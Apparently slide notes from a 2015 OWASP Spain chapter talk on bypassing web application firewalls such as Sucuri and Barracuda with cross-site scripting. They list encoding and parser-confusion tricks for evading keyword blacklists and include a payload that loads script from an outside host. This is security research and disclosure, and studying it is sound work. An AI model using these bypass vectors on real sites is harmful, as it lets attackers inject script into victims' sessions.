A Talk by Ashar Javed
@
IX OWASP Spain Chapter Meeting
12th June 2015, Barcelona (Spain)
Credits: @2sharmavishal for giving me an idea of making a comparison b/w Sucuri and Pizza
Credits: @Paul_Reviews
for heads up and provided me a URL for further testing, rewarded my findings & quickly fixed all XSS bypasses ...
%26 instead of &
works in old IE browser e.g., IE7 and vector makes use of CSS escaping
\0a == line feed
\0b == vertical tab
\0c == form feed
I used closing angular bracket as a value of class attribute and the purpose is to fool the parser ...
Use of `` instead of parenthesis () for function call. ES6 provides this.
At that time, Sucuri tries to block keywords like alert, prompt and confirm. I used InputBox as a POC.
I used source property of regexp object. It returns the string without slashes. The purpose is to defeat black-listed keyword confirm.
Credits: @kinugawamasato
Related Writeup Here
<script%2fsrc='http://xssplaygroundforfunandlearn.netai.net/scr2.js'> < </script>
Decimal encoding of character "t" == t
while & == %26 and # == %23
Hex encoding of character "t" and then URL encode & and # sign
Hex encoding of : (IE specific) and then URL encode & and #
Note: Now they have made some changes in the implementation
while name == javascript:alert(1)
Note: Remember we were facing a limitation of 7 chars ...
Note: I think, SQLi is also there ... Anyone can play a cat-and-mouse game specific to SQLi :D
A never ending game ... ?
Note: The bypasses will be available when Barracuda will fix.
HTMLSecSweeper is a research tool that finds an XSS in an automated manner in three common contexts.